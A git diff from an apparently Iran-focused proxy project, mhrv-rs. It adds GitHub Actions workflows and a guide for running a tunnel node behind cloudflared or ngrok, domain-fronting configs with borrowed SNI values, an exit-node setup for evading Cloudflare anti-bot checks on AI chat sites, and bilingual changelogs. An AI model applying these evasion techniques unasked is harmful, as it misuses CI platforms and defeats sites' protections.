+            -p 8080:8080 \
+            -e TUNNEL_AUTH_KEY \
+            ghcr.io/therealaleph/mhrv-tunnel-node:latest
+          sleep 5
+          curl -s http://localhost:8080/health || sleep 5
+
+      - name: Install cloudflared
+        run: |
+          curl -L --output cloudflared.deb \
+            https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
+          sudo dpkg -i cloudflared.deb
+
+      - name: Expose tunnel
+        run: |
+          cloudflared tunnel --url http://localhost:8080 2>&1 | tee tunnel.log &
+          # Tunnel registration takes a variable amount of time, so poll the
+          # log for the URL (up to ~60 s) instead of reading it once.
+          URL=""
+          for _ in $(seq 1 30); do
+            sleep 2
+            URL=$(grep -o 'https://[a-zA-Z0-9.-]*\.trycloudflare\.com' tunnel.log | head -1)
+            if [ -n "$URL" ]; then
+              break
+            fi
+          done
+          if [ -z "$URL" ]; then
+            echo "::warning::No trycloudflare.com URL found yet; check the cloudflared output above."
+          fi
+          echo "TUNNEL_URL=$URL" >> "$GITHUB_ENV"
+          echo "::notice::Tunnel URL: $URL"
+          echo "TUNNEL_SERVER_URL = $URL"
+          # Keep the job alive for 350 minutes, just under the 360-minute timeout.
+          sleep 21000
+
+      - name: Cleanup
+        if: always()
+        run: |
+          docker stop mhrv-tunnel || true
+          pkill cloudflared || true
diff --git a/assets/github-actions-tunnel/ngrok.md b/assets/github-actions-tunnel/ngrok.md
new file mode 100644
index 00000000..c80810cf
--- /dev/null
+++ b/assets/github-actions-tunnel/ngrok.md
@@ -0,0 +1,137 @@
+# ngrok Tunnel
+
+Run a Full tunnel for 6 hours using an ngrok account (free tier). ngrok provides
+a public URL that exposes the tunnel-node running on GitHub Actions.
+
+## Prerequisites
+
+- A GitHub account (free)
+- An ngrok account (free — sign up at [ngrok.com](https://ngrok.com))
+- `CodeFull.gs` deployed as a Google Apps Script Web App
+
+## Setup
+
+### Step 1: Get Your ngrok Authtoken
+
+1. Go to [dashboard.ngrok.com](https://dashboard.ngrok.com) and sign in
+2. Copy your authtoken from the **Getting Started** or **Your Authtoken** section
+
+### Step 2: Create the Repository
+
+If you already have a repository from another method, you can reuse it.
+Otherwise:
+
+1. Go to [github.com](https://github.com) and sign in
+2. Click the **+** icon in the top-right corner, then **New repository**
+3. Enter a repository name (e.g., `my-tunnel`)
+4. Select **Private** (recommended — keeps your secrets secure)
+5. Click **Create repository**
+
+### Step 3: Add the Secrets
+
+1. In your repository, go to **Settings > Secrets and variables > Actions**
+2. Click **New repository secret** and add:
+
+   | Name | Value |
+   |---|---|
+   | `TUNNEL_AUTH_KEY` | A strong password. You will also set this in `CodeFull.gs`. |
+   | `NGROK_AUTH_TOKEN` | Your ngrok authtoken from Step 1. |
+
+3. Click **Add secret** for each
+
+### Step 4: Add the Workflow
+
+1. In your repository, go to the **Actions** tab
+2. Click **New workflow**
+3. Click the **set up a workflow yourself** link
+4. Delete the default content and paste the contents of `ngrok.yml` [[here]]
+5. Click **Commit changes...**, add a commit message, then click **Commit changes**
+
+The workflow file will be saved to `.github/workflows/ngrok.yml`.
+
+### Step 5: Run the Workflow
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (ngrok)** from the left sidebar
+3. Click **Run workflow > Run workflow**
+
+The workflow will start immediately.
+
+### Step 6: Get the Tunnel URL
+
+1. Click on the running workflow to see live logs
+2. Open the **Expose tunnel** step and wait about 10 seconds for the URL to be printed (the step itself keeps running for the whole session)
+3. Look for the `::notice::Tunnel URL:` line in the log output
+4. Copy the URL — it will look like `https://abc123.ngrok-free.app`
+
+### Step 7: Configure CodeFull.gs
+
+Open `CodeFull.gs` in the Google Apps Script editor and update these constants:
+
+```javascript
+const TUNNEL_SERVER_URL = "https://abc123.ngrok-free.app";
+const TUNNEL_AUTH_KEY = "the-secret-you-set-in-step-3";
+```
+
+Deploy: **Deploy > New Deployment > Web App**.
+Copy the new Deployment ID and update your `mhrv-rs` config.
+
+### Step 8: Verify
+
+`mhrv-rs test` is wired only for the apps_script relay path; in Full mode it
+refuses to run. To verify a Full-mode tunnel, visit `https://ipleak.net` (or
+`https://whatismyipaddress.com`) through your proxy — you should see a
+GitHub Actions or ngrok IP address.
+
+## How It Works
+
+1. GitHub Actions starts a Docker container running `mhrv-tunnel-node` on port
+   `8080`
+2. `ngrok` creates a secure tunnel using your authtoken and exposes it on a
+   public `*.ngrok-free.app` URL that routes to `localhost:8080` on the runner
+3. The workflow extracts this URL from the ngrok API and displays it
+4. `CodeFull.gs` forwards tunnel operations to this URL over HTTPS
+5. The runner stays alive for 6 hours, then shuts down automatically
+
+## Renewing the Tunnel
+
+The tunnel shuts down after 6 hours. To start a new session:
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (ngrok)**
+3. Click **Run workflow > Run workflow**
+4. Check the tunnel URL in the logs. Each ngrok free account gets one
+   auto-assigned **dev domain** that's permanent across runs — the URL is the
+   same every time you re-run the workflow, so no `CodeFull.gs` update is
+   needed after the initial setup.
+
+## Limitations
+
+- Requires an ngrok account (free tier: 1 online tunnel, limited connections
+  per minute).
+- **ngrok TLD note**: ngrok handed out `*.ngrok-free.app` domains until early
+  2026; new free-tier accounts now get `*.ngrok-free.dev` instead, with no
+  way to switch back. **Some Iran ISPs block `*.ngrok-free.dev` at the DNS
+  layer.** If your tunnel works on a non-Iran network but `curl` from your
+  Iran network times out at TCP, the `.dev` block is why. Workarounds:
+  - Switch to **cloudflared Quick** (Method 1) — different TLD, often passes
+    where ngrok's `.dev` doesn't.
+  - Switch to **HuggingFace Spaces (Docker)** — run tunnel-node directly on
+    a Space, get a permanent `*.hf.space` URL with no tunnel layer.
+  - Pay for ngrok's $10/mo Personal plan to get a `*.ngrok.app` domain
+    (the older, more widely allowlisted TLD).
+- 6-hour maximum per session (GitHub Actions limit).
+- Slightly higher latency than cloudflared methods (extra hop through ngrok's
+  relay servers).
+
+## Troubleshooting
+
+| Problem | Solution |
+|---|---|
+| ngrok authentication fails | Verify `NGROK_AUTH_TOKEN` matches the token in your [ngrok dashboard](https://dashboard.ngrok.com). |
+| Workflow fails at Docker step | GitHub Actions may be pulling the image for the first time. Wait 2-3 minutes and retry. |
+| No tunnel URL appears in logs | Check that the **Expose tunnel** step has started and is still running. The URL is fetched from the ngrok API — allow 10 seconds for the tunnel to establish. |
+| Connection limit reached | ngrok's free tier limits connections per minute. Wait a moment and retry. |
+| `CodeFull.gs` returns 502 or timeout | Verify the tunnel URL is correct and the workflow is still running. Check that `TUNNEL_AUTH_KEY` matches in both the secret and `CodeFull.gs`. |
+
+[here]: ngrok.yml
diff --git a/assets/github-actions-tunnel/ngrok.yml b/assets/github-actions-tunnel/ngrok.yml
new file mode 100644
index 00000000..ae4ea050
--- /dev/null
+++ b/assets/github-actions-tunnel/ngrok.yml
@@ -0,0 +1,71 @@
+# Runs mhrv-tunnel-node on a GitHub-hosted runner and exposes it through an
+# ngrok HTTP tunnel for the duration of one job.
+name: Full Tunnel (ngrok)
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  tunnel:
+    runs-on: ubuntu-latest
+    timeout-minutes: 360
+    steps:
+      - name: Start mhrv-tunnel-node
+        # The secret reaches the shell as an environment variable rather than
+        # being pasted into the script text, so quotes or $ in it cannot alter it.
+        env:
+          TUNNEL_AUTH_KEY: ${{ secrets.TUNNEL_AUTH_KEY }}
+        run: |
+          docker run -d --name mhrv-tunnel \
+            -p 8080:8080 \
+            -e TUNNEL_AUTH_KEY \
+            ghcr.io/therealaleph/mhrv-tunnel-node:latest
+          sleep 5
+          curl -s http://localhost:8080/health || sleep 5
+
+      - name: Install ngrok
+        env:
+          NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
+        run: |
+          curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
+            | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
+            && echo "deb https://ngrok-agent.s3.amazonaws.com bookworm main" \
+            | sudo tee /etc/apt/sources.list.d/ngrok.list \
+            && sudo apt update \
+            && sudo apt install -y ngrok
+          ngrok config add-authtoken "$NGROK_AUTH_TOKEN"
+
+      - name: Expose tunnel
+        id: expose
+        run: |
+          ngrok http 8080 --log=stdout > ngrok.log &
+          # The local ngrok API may not list the tunnel yet right after start,
+          # so poll it (up to ~30 s) instead of indexing into the tunnel list
+          # after a single fixed sleep.
+          URL=""
+          for _ in $(seq 1 15); do
+            sleep 2
+            URL=$(curl -s http://localhost:4040/api/tunnels | python3 -c "import sys,json;t=json.load(sys.stdin).get('tunnels') or [];print(t[0]['public_url'] if t else '')" 2>/dev/null || true)
+            if [ -n "$URL" ]; then
+              break
+            fi
+          done
+          if [ -z "$URL" ]; then
+            echo "::error::ngrok did not report a tunnel URL; see the ngrok log below."
+            cat ngrok.log
+            exit 1
+          fi
+          echo "TUNNEL_URL=$URL" >> "$GITHUB_OUTPUT"
+          echo "::notice::Tunnel URL: $URL"
+          echo "TUNNEL_SERVER_URL = $URL"
+          # Keep the job alive for 350 minutes, just under the 360-minute timeout.
+          sleep 21000
+
+      - name: Cleanup
+        if: always()
+        run: |
+          docker stop mhrv-tunnel || true
+          pkill ngrok || true
diff --git a/assets/launchers/run.bat b/assets/launchers/run.bat
index 11748d99..bf5939c3 100644
--- a/assets/launchers/run.bat
+++ b/assets/launchers/run.bat
@@ -60,10 +60,22 @@ if not "%UI_EXIT%"=="0" (
         echo   - running inside RDP or a VM without GPU acceleration
         echo   - antivirus blocking the exe — whitelist the folder and retry
         echo.
-        echo Copy everything above and open an issue on:
-        echo   https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues
+        echo You can still use mhrv-rs without the UI. Run the CLI directly:
+        echo.
+        echo     mhrv-rs.exe
+        echo.
+        rem Carets below escape parentheses so they cannot close the enclosing if block.
+        echo Set your config in %%APPDATA%%\mhrv-rs\config\config.json ^(or
+        echo place a config.json next to mhrv-rs.exe in this folder^), then
+        echo point your browser proxy at 127.0.0.1:8085 ^(HTTP^) or
+        echo 127.0.0.1:8086 ^(SOCKS5^). The CLI is the same proxy without
+        echo the UI shell, so all functionality is available.
+        echo.
+        echo Falling back to the CLI now so you can keep using the proxy.
+        echo Press Ctrl+C in the CLI window to stop it.
         echo ---------------------------------------------------
-        pause
+        echo.
+        mhrv-rs.exe
     )
 )
 
diff --git a/config.google-only.example.json b/config.direct.example.json
similarity index 88%
rename from config.google-only.example.json
rename to config.direct.example.json
index 890f966d..c0a95948 100644
--- a/config.google-only.example.json
+++ b/config.direct.example.json
@@ -1,5 +1,5 @@
 {
-  "mode": "google_only",
+  "mode": "direct",
   "google_ip": "216.239.38.120",
   "front_domain": "www.google.com",
   "listen_host": "127.0.0.1",
diff --git a/config.exit-node.example.json b/config.exit-node.example.json
new file mode 100644
index 00000000..8af55161
--- /dev/null
+++ b/config.exit-node.example.json
@@ -0,0 +1,35 @@
+{
+  "_comment": "Example config for using mhrv-rs with an exit-node deployment to bypass Cloudflare anti-bot blocks on chatgpt.com / claude.ai / grok.com / x.com. See assets/exit_node/README.md for the deployment walkthrough.",
+  "mode": "apps_script",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "auth_key": "PUT_YOUR_APPS_SCRIPT_AUTH_KEY_HERE",
+  "script_id": [
+    "PUT_YOUR_APPS_SCRIPT_DEPLOYMENT_ID_HERE"
+  ],
+  "listen_host": "0.0.0.0",
+  "listen_port": 8085,
+  "socks5_port": 8086,
+  "log_level": "info",
+  "verify_ssl": true,
+  "exit_node": {
+    "_comment": "Master switch. Set false to disable exit-node entirely without removing the config. Default false.",
+    "enabled": true,
+    "_comment_relay_url": "Public URL of your deployed exit-node handler (assets/exit_node/exit_node.ts running on Deno Deploy, fly.io, your own VPS, etc.).",
+    "relay_url": "https://your-deployed-exit-node.example.com",
+    "_comment_psk": "Pre-shared key — must match the PSK constant in your deployed source. Generate with: openssl rand -hex 32",
+    "psk": "PUT_YOUR_EXIT_NODE_PSK_HERE",
+    "_comment_mode": "selective: only `hosts` route via exit node (recommended). full: every request routes via exit node (slower, ~250-500ms extra hop).",
+    "mode": "selective",
+    "_comment_hosts": "Hostnames to route through the exit node. Matches exact OR dot-anchored suffix (chatgpt.com covers api.chatgpt.com etc.). Extend for any CF-anti-bot blocked sites you need.",
+    "hosts": [
+      "chatgpt.com",
+      "claude.ai",
+      "x.com",
+      "grok.com",
+      "openai.com",
+      "aistudio.google.com",
+      "ai.google.dev"
+    ]
+  }
+}
diff --git a/config.fronting-groups.example.json b/config.fronting-groups.example.json
new file mode 100644
index 00000000..a1759dc6
--- /dev/null
+++ b/config.fronting-groups.example.json
@@ -0,0 +1,85 @@
+{
+  "mode": "direct",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "listen_host": "127.0.0.1",
+  "listen_port": 8085,
+  "socks5_port": 8086,
+  "log_level": "info",
+  "verify_ssl": true,
+  "fronting_groups": [
+    {
+      "name": "vercel",
+      "ip": "76.76.21.21",
+      "sni": "react.dev",
+      "domains": [
+        "vercel.com",
+        "vercel.app",
+        "vercel.dev",
+        "vercel.live",
+        "vercel.sh",
+        "nextjs.org",
+        "now.sh",
+        "cursor.com",
+        "ai-sdk.dev"
+      ]
+    },
+    {
+      "name": "fastly",
+      "ip": "151.101.1.140",
+      "sni": "www.python.org",
+      "domains": [
+        "redd.it",
+        "reddit.com",
+        "redditstatic.com",
+        "redditmedia.com",
+        "reddit.app.link",
+        "redditblog.com",
+        "reddithelp.com",
+        "redditinc.com",
+        "redditmail.com",
+        "redditspace.com",
+        "redditstatus.com",
+        "reddit.map.fastly.net",
+
+        "githubassets.com",
+        "githubusercontent.com",
+        "github.io",
+
+        "pypi.org",
+
+        "fastly.com",
+        "fastly-edge.com",
+        "fastly-terrarium.com",
+        "fastly.io",
+        "fastly.net",
+        "fastlylabs.com",
+        "fastlylb.net",
+
+        "www.pinterest.com",
+        "pinimg.com",
+        
+        "cnn.com",
+        "cnn.io",
+        "cnn.it",
+        "cnnarabic.com",
+        "cnnlabs.com",
+        "cnnmoney.ch",
+        "cnnmoney.com",
+        "cnnmoneystream.com",
+        "cnnpolitics.com",
+
+        "buzzfeed.com"
+      ]
+    },
+    {
+      "name": "netlify",
+      "ip": "35.157.26.135",
+      "sni": "letsencrypt.org",
+      "domains": [
+        "netlify.app",
+        "netlify.com"
+      ]
+    }
+  ]
+}
diff --git a/docs/changelog/v1.6.1.md b/docs/changelog/v1.6.1.md
new file mode 100644
index 00000000..d5e72c8d
--- /dev/null
+++ b/docs/changelog/v1.6.1.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• پایداری چرخه‌ٔ سشن VPN در اندروید ([#187](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/187)): پنج رفع باگ کوچک ولی واقعی در سرویس VPN اندروید: (۱) دکمهٔ Connect/Disconnect حالا روی state-flow `VpnState.isRunning` گیت میشه (با backstop ۱۲ ثانیه‌ای) به جای تایمر ثابت ۲ ثانیه — جلوی race condition بین Stop و Connect رو می‌گیره که قبلاً منجر به `Address already in use` می‌شد. (۲) `Tun2proxy.stop()` حالا با timeout ۲ ثانیه‌ای بسته شده تا اگر روی native call hang کنه، کل teardown thread رو نگه نداره. (۳) رفع نشت file descriptor بین `detachFd()` و `Thread.start()` — اگه start بخاطر OOM throw می‌کرد، fd یتیم می‌شد. (۴) doc-comment گمراه‌کننده در teardown اصلاح شد. (۵) handler crash trap حالا `Log.e` رو در try/catch می‌پیچه تا اگه خود لاگ throw کنه، handler بازگشتی نشه
+---
+• Android VPN session lifecycle reliability ([#187](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/187)): five small but real fixes in the Android VPN service. (1) Connect/Disconnect button is now gated on the `VpnState.isRunning` state flow with a 12 s backstop instead of a fixed 2 s `transitionCooldown` timer — closes the race window where users tapping Connect right after Stop would hit "Address already in use" because the previous teardown's listener-socket release hadn't completed yet. (2) `Tun2proxy.stop()` is now wrapped in a 2 s `join()` timeout — if the native call hangs, the bounded tun2proxy thread join + bounded `rt.shutdown_timeout` below it still release the listener port instead of holding the teardown thread. (3) File-descriptor leak fixed between `parcelFd.detachFd()` and `Thread.start()` — if `start()` threw (OOM under memory pressure), the detached fd had no owner and leaked for the process lifetime; now adopted into a fresh `ParcelFileDescriptor` purely so we can `close()` it. (4) Misleading teardown doc-comment rewritten — the "step 2 closes the TUN fd to force EBADF on read" claim has been factually wrong since `detachFd` landed; corrected so future debuggers don't chase a phantom safety net. (5) Recursive crash trap in `MhrvApp`'s uncaught-exception handler — `Log.e` is now wrapped in try/catch so a logd failure during exception logging falls through to the previous handler with the real exception
diff --git a/docs/changelog/v1.6.2.md b/docs/changelog/v1.6.2.md
new file mode 100644
index 00000000..402d8a5e
--- /dev/null
+++ b/docs/changelog/v1.6.2.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "همهٔ دانلودها روی ۲۵۶ کیلوبایت قطع میشن" ([#162](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/162)): در relay range-parallel، اگه validation هر chunk رد می‌شد (مثلاً Apps Script هدر `Content-Range` رو حذف می‌کرد، یا origin روی chunkهای بعدی به جای 206 یه 200 برمی‌گردوند)، fallback اشتباهی پاسخ probe (یعنی فقط ۲۵۶ کیلوبایت اول) رو به‌عنوان فایل کامل برمی‌گردوند. مرورگر `HTTP 200` با `Content-Length=262144` می‌دید و دانلود رو "کامل" تلقی می‌کرد. حالا fallback یک GET تک‌مرحله‌ای جدید بدون Range هدر می‌فرسته که Apps Script کل URL رو fetch کنه (تا سقف ۵۰ مگ). برای فایل‌های بزرگ‌تر کندتره از مسیر parallel، ولی پاسخ کامل می‌ده — که اون چیزی هست که اهمیت داره. ۲ کاربر مستقل این رو ریپورت کردن (Ehsan، Recruit1992)
+---
+• Fix "every download capped at 256 KB" bug ([#162](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/162)): in range-parallel relay, when any chunk failed validation (e.g. Apps Script stripping the `Content-Range` header on follow-up chunks, or origin returning 200-instead-of-206 on later chunks), the fallback path silently returned the probe response (the first 256 KiB) as if it were the full file. Browsers saw `HTTP 200` with `Content-Length=262144` and treated the download as complete. The fallback now does a fresh single GET without the Range header, letting Apps Script fetch the full URL (up to its 50 MiB cap). Slower than the parallel path for large files, but produces a complete response — which is what matters. Two independent users (Ehsan, Recruit1992) reported this; closed-loop with both
diff --git a/docs/changelog/v1.6.3.md b/docs/changelog/v1.6.3.md
new file mode 100644
index 00000000..7be78d25
--- /dev/null
+++ b/docs/changelog/v1.6.3.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "نوتیفیکیشن سرور اندروید پورت اشتباه SOCKS5 رو نشون می‌داد" ([#211](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/211)): با تنظیمات پیش‌فرض اندروید (`listenPort=8080`, `socks5Port=1081`)، نوتیفیکیشن می‌نوشت `Routing via SOCKS5 127.0.0.1:8081` که اشتباه بود — listener واقعی روی `1081` اجرا می‌شد. هر کاربری که پروکسی تلگرام رو روی پورت نوتیفیکیشن (8081) ست می‌کرد، در سکوت fail می‌شد. علت: تابع `buildNotif` به‌جای خوندن `cfg.socks5Port`، hardcode می‌کرد `proxyPort + 1`. حالا متن نوتیفیکیشن همون منطق elvis fallback `cfg.socks5Port ?: (cfg.listenPort + 1)` رو که در تنظیم listener واقعی استفاده می‌شه می‌خونه و علاوه بر SOCKS5، پورت HTTP رو هم نشون می‌ده: `HTTP 127.0.0.1:8080  ·  SOCKS5 127.0.0.1:1081`. ۲ کاربر مستقل ریپورت کردن (vpnineh، l3est)
+---
+• Fix "Android server notification showed wrong SOCKS5 port" bug ([#211](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/211)): with the default Android config (`listenPort=8080`, `socks5Port=1081`), the foreground-service notification read `Routing via SOCKS5 127.0.0.1:8081` — wrong, since the real listener was on `1081`. Anyone configuring Telegram (or any per-app SOCKS5 client) against the notification value silently failed. Cause: `buildNotif` hardcoded `proxyPort + 1` instead of reading `cfg.socks5Port`. The notification now uses the same elvis fallback `cfg.socks5Port ?: (cfg.listenPort + 1)` that the actual listener uses, and shows both ports for clarity: `HTTP 127.0.0.1:8080  ·  SOCKS5 127.0.0.1:1081`. Two independent users (vpnineh, l3est) reported this
diff --git a/docs/changelog/v1.6.4.md b/docs/changelog/v1.6.4.md
new file mode 100644
index 00000000..0461620f
--- /dev/null
+++ b/docs/changelog/v1.6.4.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "L7 multiplexer در Full mode batch نمی‌کنه" ([#231](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/231)): در حالت Full، انتظار می‌رفت که چند op به یک batch HTTP request به Apps Script ترکیب بشن (`batch: 5 ops` یا `batch: 10 ops`)، ولی log نشون می‌داد همیشه `batch: 1 ops` — یعنی هر op جدا یه round-trip Apps Script می‌گرفت (که هر کدوم 2 تا 7 ثانیه طول می‌کشن). علت: loop دریافت پیام بلافاصله بعد از اولین message با `try_recv()` (non-blocking) صف رو drain می‌کرد، بدون pause برای جمع‌آوری بقیه ops. **Fix:** بعد از اولین op، یه پنجرهٔ ۸ میلی‌ثانیه‌ای باز می‌مونه تا opهای بعدی (مثل parallel fetches، HTTP/2 streams) همون batch رو پر کنن. ۸ms در مقابل ~۲ تا ۷ ثانیه RTT Apps Script اصلاً ناچیزه ولی efficiency batching رو برمی‌گردونه. ریپورت شده توسط w0l4i با log واضح
+---
+• Fix "L7 multiplexer not batching in Full mode" bug ([#231](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/231)): in `full` mode, multiple ops should coalesce into a single batched HTTP request to Apps Script (`batch: 5 ops` or `batch: 10 ops`), but logs showed `batch: 1 ops` consistently — each op got its own Apps Script round-trip (2-7 s each). Cause: the receive loop drained the channel via `try_recv()` (non-blocking) immediately after the first message arrived, with no window to let concurrent ops accumulate. **Fix:** after the first op lands, hold the buffer open for an 8 ms coalescing window so concurrent ops (parallel fetches, HTTP/2 stream openings, etc.) land in the same batch. 8 ms is rounding error against the ~2-7 s Apps Script RTT but restores the entire batching premise. Reported by w0l4i with a clean log snippet
diff --git a/docs/changelog/v1.6.5.md b/docs/changelog/v1.6.5.md
new file mode 100644
index 00000000..ab870666
--- /dev/null
+++ b/docs/changelog/v1.6.5.md
@@ -0,0 +1,10 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• اضافه شدن twitter.com به URL normalization اکس/توییتر ([#245](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/245)): قبلاً normalization GraphQL URL فقط روی `x.com` کار می‌کرد. کاربری که از extension "Control Panel for Twitter" استفاده می‌کنه که همه‌چی رو به `twitter.com` redirect می‌کنه، URL shortening رو از دست می‌داد و درخواست‌هاش به Apps Script `URI Too Long` می‌گرفت. حالا match هر دو domain رو می‌گیره. ممنون از Parsa307
+• امکان کپی log در نسخهٔ اندروید ([#255](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/255)): دکمهٔ Copy کنار Clear در Live Log اضافه شد. خط‌های log الان قابل selection هستن. تا قبل از این، گرفتن log از گوشی نیازمند `adb logcat` بود — برای کاربرهایی که issue با logcat تجربه ندارن، debug کردن سخت بود. ممنون از @dazzling-no-more
+• اضافه کردن چندین deployment ID به‌صورت یکجا در نسخهٔ اندروید ([#257](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/257)): فیلد "+ Add" حالا multi-line هست و paste کردن لیست IDها (با newline، کاما، یا semicolon جدا شده) رو می‌پذیره. paste در یه entry موجود هم automatic بهش split و expand می‌شه. تا قبل از این، اضافه کردن ۶ تا ID نیازمند ۶ بار tap "+ Add" بود. ممنون از @dazzling-no-more
+• رفع باگ "google_only mode: plain HTTP proxy requests are not supported" ([#256](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/256)): تایپ کردن `http://example.com` (بدون https) در browser در حالت google_only یه ۵۰۲ می‌داد، در حالی که `https://example.com` (CONNECT) خوب fall-through می‌کرد به direct TCP. حالا plain HTTP proxy request هم passthrough می‌شه (با حفظ `upstream_socks5` اگه ست شده). ۴ تا unit test جدید برای parsing absolute-form URI، fallback به Host header، و edge cases IPv6. ممنون از @dazzling-no-more
+---
+• Add twitter.com to X/Twitter URL normalization ([#245](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/245)): the GraphQL `?variables=...` shortening previously only matched `x.com`. Users running the "Control Panel for Twitter" extension (which redirects everything back to `twitter.com`) lost the shortening and hit `URI Too Long` from Apps Script. Now matches both domains. Thanks Parsa307
+• Add ability to copy logs in Android ([#255](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/255)): Copy button added next to Clear in the Live Log pane; log lines are now selectable. Before this, getting logs off the device required tethering with `adb logcat` — a barrier for users without that experience. Thanks @dazzling-no-more
+• Add bulk parser for deployment IDs in Android ([#257](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/257)): the "+ Add" field is now multi-line and accepts a paste of multiple IDs separated by whitespace/newline/comma/semicolon. Pasting into an existing entry also auto-splits and expands. Adding 6 IDs used to require 6 separate "+ Add" taps. Thanks @dazzling-no-more
+• Fix "google_only mode: plain HTTP proxy requests are not supported" 502 ([#256](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/256)): typing `http://example.com` (without https) in the browser in google_only mode returned a 502, even though `https://example.com` (CONNECT) fell through cleanly to direct TCP. Plain-HTTP proxy requests now passthrough too (honoring `upstream_socks5` if set). 4 new unit tests covering absolute-form URI parsing, Host-header fallback, and IPv6 edge cases. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.0.md b/docs/changelog/v1.7.0.md
new file mode 100644
index 00000000..bbbd940e
--- /dev/null
+++ b/docs/changelog/v1.7.0.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• پشتیبانی native از پروتکل udpgw در Full mode ([#222](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/222)): tunnel-node حالا یه virtual session جدید برای آدرس magic `198.18.0.1:7300` داره که tun2proxy اندروید بهش وصل می‌شه. به جای یه session UDP per-destination، تمام UDP از همون یه TCP persistent tunnel می‌گذره. **نتیجه**: تماس صوتی/تصویری Telegram و Google Meet در Full mode روی اندروید کار می‌کنن (تا قبل از این، polling به‌صورت session-per-destination زیر تعداد زیاد flowهای STUN/RTP گیر می‌کرد). QUIC (UDP/443) و DNS (UDP/53) به‌عنوان یه لایهٔ احتیاطی اضافه از udpgw مسدود می‌شن — مرورگرها به TCP/HTTPS fallback می‌کنن (سریع‌تر از QUIC over batched relay)، و DNS از virtual DNS tun2proxy استفاده می‌کنه (پایدارتر). **نیاز به redeployment image Docker tunnel-node داره**: `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:1.7.0`. ممنون از @yyoyoian-pixel
+• چیدمان مجدد صفحهٔ اصلی اندروید برای لیست‌های بلند deployment-ID ([#258](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/258)، closes [#246](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/246)): دکمهٔ Connect/Disconnect حالا زیر فیلد Mode pinned هست — قبلاً اگه ۱۰ تا deployment ID داشتید، باید کل لیست رو scroll می‌کردید برای رسیدن به Connect. App picker هم حالا appهای از قبل انتخاب‌شده رو در بالای لیست نشون می‌ده، نه پراکنده در ترتیب alphabetical. ممنون از @dazzling-no-more
+• tooling release-drafter + prepare-release ([#260](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/260)): release-drafter به‌صورت تدریجی PRهای merge شده رو در یه draft release جمع می‌کنه که در زمان tag دادن آماده هست. workflow `prepare-release.yml` (manual dispatch) خودکار `Cargo.toml` و `build.gradle.kts` رو bump می‌کنه و یه stub `docs/changelog/v<ver>.md` می‌سازه که maintainer فقط Persian half + verb tense fixes رو کامل می‌کنه. flow release موجود (matrix build → GH release → Telegram) دست نخورده. ممنون از @dazzling-no-more
+---
+• Native udpgw protocol support in Full mode ([#222](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/222)): tunnel-node now hosts a virtual session at the magic address `198.18.0.1:7300` that Android's tun2proxy connects to. Instead of a UDP session per destination, all UDP flows through one persistent TCP tunnel. **Result**: Telegram voice/video calls and Google Meet now work in Full mode on Android (per-destination polling previously stalled under STUN/RTP flow counts). QUIC (UDP/443) and DNS (UDP/53) are blocked from udpgw as a belt-and-suspenders guard — browsers fall back to TCP/HTTPS (faster through the batch pipeline than QUIC), and DNS uses tun2proxy's virtual DNS (more reliable). **Requires redeploying the tunnel-node Docker image**: `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:1.7.0`. Thanks @yyoyoian-pixel
+• Restructured Android home screen for long deployment-ID lists ([#258](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/258), closes [#246](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/246)): Connect/Disconnect button is now pinned right under the Mode field — previously, with 10+ deployment IDs the user had to scroll past the entire list to reach Connect every session. App picker now shows pre-selected apps at the top instead of scattered through the alphabetical list. Thanks @dazzling-no-more
